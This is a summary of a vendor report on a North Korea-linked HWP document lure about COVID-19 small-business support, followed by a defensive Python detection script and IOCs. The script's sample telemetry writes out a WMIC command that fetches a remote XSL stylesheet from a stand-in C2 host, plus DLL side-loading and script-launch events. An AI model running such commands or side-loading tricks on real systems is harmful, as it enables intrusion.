Thallium group: HWP attack disguised as a comprehensive guide to COVID-19 small-business support

2021-02-17, ESTsecurity: Thallium group HWP attack disguised as a comprehensive guide to COVID-19 small-business support

https://blog.alyac.co.kr/3586


ESTsecurity analyzed a malicious HWP document, attributed to the Thallium group, that was disguised as a comprehensive guide to COVID-19 support for small business owners. The document used embedded OLE objects and fake confirmation imagery to lure the user into launching apisecurity.vbs, which staged apisecurity.key as xmllite.dll under the OneDrive directory so that OneDrive.exe would side-load it. The payload attempted command-and-control communication through a WMIC/XSL Script Processing command that referenced an FTP URL on b.smtper[.]co, and the article tied this tradecraft to earlier Thallium spear-phishing and supply-chain cases. The report highlights this North Korea-linked cluster's continued use of Korean-language document lures, HWP/OLE execution tricks, and stealthy OneDrive-based DLL side-loading.
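The three behaviours summarized above (a system DLL name loaded from a user-writable application directory, WMIC pulling an XSL stylesheet from a remote URL, and a script host spawned by a document viewer) are all visible in ordinary endpoint telemetry. The following detection script is an added example, not code from ESTsecurity or from the report; it runs over a handful of constructed JSON-lines events (the paths, the `c2.example.invalid` host and the `Hwp.exe` viewer process name are assumptions, and the side-loading rule is generalized to any directory outside System32/SysWOW64 rather than only the OneDrive path named in the report).

```python
import json
import re
from pathlib import PureWindowsPath

# Directories from which Windows normally serves the watched DLLs.
SYSTEM_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}
# DLL names seen abused for side-loading in the report; a copy elsewhere is suspicious.
WATCHED_DLLS = {"xmllite.dll"}
# Script hosts that a document viewer should never spawn (viewer name is an assumption).
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
DOCUMENT_VIEWERS = {"hwp.exe"}
# WMIC /format: pointing at a remote stylesheet (XSL Script Processing over http/ftp).
REMOTE_XSL = re.compile(r'/format\s*:\s*"?(?:https?|ftp)://', re.IGNORECASE)

# Constructed sample telemetry (not from the report): image-load and process-create events.
SAMPLE_LOG = [
    r'{"type": "image_load", "process": "C:\\Users\\victim\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe", "image": "C:\\Users\\victim\\AppData\\Local\\Microsoft\\OneDrive\\xmllite.dll"}',
    r'{"type": "image_load", "process": "C:\\Windows\\explorer.exe", "image": "C:\\Windows\\System32\\xmllite.dll"}',
    r'{"type": "process_create", "image": "C:\\Windows\\System32\\wbem\\WMIC.exe", "parent": "C:\\Users\\victim\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe", "cmdline": "wmic os get /format:\"ftp://u:p@c2.example.invalid/beta/stylesheet.xsl\""}',
    r'{"type": "process_create", "image": "C:\\Windows\\System32\\wbem\\WMIC.exe", "parent": "C:\\Windows\\System32\\cmd.exe", "cmdline": "wmic os get caption"}',
    r'{"type": "process_create", "image": "C:\\Windows\\System32\\wscript.exe", "parent": "C:\\Program Files\\Hnc\\Hwp.exe", "cmdline": "wscript.exe apisecurity.vbs"}',
    "this line is not JSON and must be skipped, not crash the analyzer",
]


def _name(path):
    """Lower-cased file name of a Windows path ('' for an empty path)."""
    return PureWindowsPath(path).name.lower()


def _parent_dir(path):
    """Lower-cased directory part of a Windows path."""
    return str(PureWindowsPath(path).parent).lower()


def check_sideload(ev):
    """Watched DLL name loaded from outside the system directories."""
    if ev.get("type") != "image_load":
        return None
    image = ev.get("image", "")
    if _name(image) in WATCHED_DLLS and _parent_dir(image) not in SYSTEM_DIRS:
        return ("dll_sideload", f"{_name(ev.get('process', ''))} loaded {image}")
    return None


def check_wmic_xsl(ev):
    """wmic.exe invoked with /format: that fetches a stylesheet from a remote URL."""
    if ev.get("type") != "process_create" or _name(ev.get("image", "")) != "wmic.exe":
        return None
    if REMOTE_XSL.search(ev.get("cmdline", "")):
        return ("wmic_remote_xsl", ev["cmdline"])
    return None


def check_script_from_doc(ev):
    """Script host whose parent is a document viewer (assumed viewer process name)."""
    if ev.get("type") != "process_create":
        return None
    if _name(ev.get("image", "")) in SCRIPT_HOSTS and _name(ev.get("parent", "")) in DOCUMENT_VIEWERS:
        return ("script_host_from_document", f"{ev['parent']} -> {ev['cmdline']}")
    return None


RULES = (check_sideload, check_wmic_xsl, check_script_from_doc)


def analyze(lines):
    """Run every rule over each JSON-lines event; malformed lines are skipped."""
    findings = []
    for line in lines:
        try:
            ev = json.loads(line)
        except ValueError:
            continue
        for rule in RULES:
            hit = rule(ev)
            if hit:
                findings.append(hit)
    return findings


if __name__ == "__main__":
    for rule_name, detail in analyze(SAMPLE_LOG):
        print(f"[{rule_name}] {detail}")
```

The rules are deliberately independent so that each can be tuned on its own: the side-loading check generalizes to any host process, so in production it will also fire on legitimately redistributed copies of the DLL and should be allow-listed per application, while the WMIC rule keys on the remote URL scheme rather than on a specific domain and therefore survives infrastructure changes such as a new C2 host.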

Indicators of Compromise

Type     Value                                     First Seen   Last Seen
URL      ftp://u:[email protected]/beta/usop…     2021-02-17   2021-02-17
DOMAIN   b.smtper.co                               2021-02-17   2021-02-17
